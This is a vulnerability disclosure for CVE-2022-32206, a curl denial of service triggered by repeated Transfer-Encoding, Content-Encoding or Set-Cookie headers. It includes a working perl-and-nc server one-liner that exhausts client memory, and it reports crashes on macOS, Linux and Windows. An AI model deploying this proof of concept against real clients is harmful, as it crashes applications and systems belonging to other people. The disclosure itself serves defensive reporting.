CVE-2022-32206: HTTP compression denial of service

## Summary: Curl does not prevent resource consumption when processing certain header types, but keeps on allocating more and more resources until the application terminates (or the system crashes, see below). The attack vectors include (at least): - Sending many `Transfer-Encoding`with repeated encodings such as "gzip,gzip,gzip,..." - if `CURLOPT_ACCEPT_ENCODING` is set sending many `Content-Encoding` with repeated encodings such as "gzip,gzip,gzip,..." - Sending many `Set-Cookie` with unique cookie names and about 4kbyte value ## Steps To Reproduce: 1.Run the following HTTP server: `perl -e 'print "HTTP/1.1 200 OK\r\n";for (my $i=0; $i < 10000000; $i++) { printf "Transfer-Encoding: " . "gzip," x 20000 . "\r\n"; }' | nc -v -l -p 9999` 2. `curl http://localhost:9999` The application will terminate when it runs out of memory. On macOS the app dies due to OOM: ``` Killed: 9 $ echo $? 137 ``` On linux it's the same: ``` Killed $ echo $? 137 ``` When targeting Windows 11 system the system would stop responding. Once the attack script was terminated the system would not recover after 10 minutes of waiting. While it was possible to log on to the system the display would remain black. Rebooting the system was necessary to recover the system to a working state. This of course is likely due to bugs in the Windows operating system or drivers. On other platforms nasty effects may also occur, such as causing extreme swapping or a system crash. Depending on how the system handles the application gobbling all memory it may result in collateral damage, for example when kernel attempts to release system resources by killing processes. ## Impact - Uncontrolled resource consumption - Uncontrolled application termination - System crash (on some platforms)